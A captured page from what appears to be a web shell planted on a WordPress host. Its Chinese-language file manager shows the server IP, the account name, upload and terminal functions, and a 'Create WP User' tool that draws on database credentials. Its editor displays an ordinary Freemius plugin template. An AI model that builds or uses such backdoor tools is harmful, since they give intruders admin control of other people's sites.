Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.216.193
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl_backup
/
wp-content
/
plugins
/
gutenslider
/
freemius
/
templates
/
partials
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
index.php
26.00 B
-rw-r--r--
2025-10-30 08:12
network-activation.php
4.86 KB
-rw-r--r--
2025-10-30 08:12
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
network-activation.php
<?php if ( ! defined( 'ABSPATH' ) ) { exit; } /** * @var array $VARS * @var Freemius $fs */ $fs = freemius( $VARS['id'] ); $slug = $fs->get_slug(); $sites = $VARS['sites']; $require_license_key = $VARS['require_license_key']; $show_delegation_option = $fs->apply_filters( 'show_delegation_option', true ); $enable_per_site_activation = $fs->apply_filters( 'enable_per_site_activation', true ); ?> <?php $separator = '<td>|</td>' ?> <div class="fs-multisite-options-container fs-apply-on-all-sites"<?php if ( ! $enable_per_site_activation ) echo ' style="display: none;"' ?>> <table class="fs-all-sites-options"> <tbody> <tr> <td width="600"> <label> <?php if ( ! $fs->is_network_upgrade_mode() ) { $apply_checkbox_label = $require_license_key ? fs_text_inline( 'Activate license on all sites in the network.', 'activate-license-on-all-sites-in-the-network', $slug ) : fs_text_inline( 'Apply on all sites in the network.', 'apply-on-all-sites-in-the-network', $slug ); } else { $apply_checkbox_label = $require_license_key ? fs_text_inline( 'Activate license on all pending sites.', 'activate-license-on-pending-sites-in-the-network', $slug ) : fs_text_inline( 'Apply on all pending sites.', 'apply-on-pending-sites-in-the-network', $slug ); } ?> <input class="fs-apply-on-all-sites-checkbox" type="checkbox" value="true" checked><span><?php echo esc_html( $apply_checkbox_label ) ?></span> </label> </td> <?php if ( ! $require_license_key ) : ?> <td><a class="action action-allow" data-action-type="allow" href="#"><?php fs_esc_html_echo_inline( 'allow', 'allow', $slug ) ?></a></td> <?php echo $separator ?> <?php if ( $show_delegation_option ) : ?> <td><a class="action action-delegate" data-action-type="delegate" href="#"><?php fs_esc_html_echo_inline( 'delegate', 'delegate', $slug ) ?></a></td> <?php endif ?> <?php if ( $fs->is_enable_anonymous() ) : ?> <?php echo $separator ?> <td><a class="action action-skip" data-action-type="skip" href="#"><?php echo strtolower( fs_esc_html_inline( 'skip', 'skip', $slug ) ) ?></a></td> <?php endif ?> <?php endif ?> </tr> </tbody> </table> <div class="fs-sites-list-container"> <table cellspacing="0"> <tbody> <?php $site_props = array('uid', 'url', 'title', 'language') ?> <?php foreach ( $sites as $site ) : ?> <tr<?php if ( ! empty( $site['license_id'] ) ) { echo ' data-license-id="' . esc_attr( $site['license_id'] ) . '"'; } ?>> <?php if ( $require_license_key ) : ?> <td><input type="checkbox" value="true" /></td> <?php endif ?> <td class="blog-id"><span><?php echo esc_html( $site['blog_id'] ) ?></span>.</td> <td width="600"><span><?php $url = str_replace( 'http://', '', str_replace( 'https://', '', $site['url'] ) ); echo esc_html( $url ); ?></span> <?php foreach ($site_props as $prop) : ?> <input class="<?php echo esc_attr( $prop ) ?>" type="hidden" value="<?php echo esc_attr($site[$prop]) ?>" /> <?php endforeach ?> </td> <?php if ( ! $require_license_key ) : ?> <td><a class="action action-allow selected" data-action-type="allow" href="#"><?php fs_esc_html_echo_inline( 'allow', 'allow', $slug ) ?></a></td> <?php echo $separator ?> <?php if ( $show_delegation_option ) : ?> <td><a class="action action-delegate" data-action-type="delegate" href="#"><?php fs_esc_html_echo_inline( 'delegate', 'delegate', $slug ) ?></a></td> <?php endif ?> <?php if ( $fs->is_enable_anonymous() ) : ?> <?php echo $separator ?> <td><a class="action action-skip" data-action-type="skip" href="#"><?php echo strtolower( fs_esc_html_inline( 'skip', 'skip', $slug ) ) ?></a></td> <?php endif ?> <?php endif ?> </tr> <?php endforeach ?> </tbody> </table> </div> </div>
关闭
保存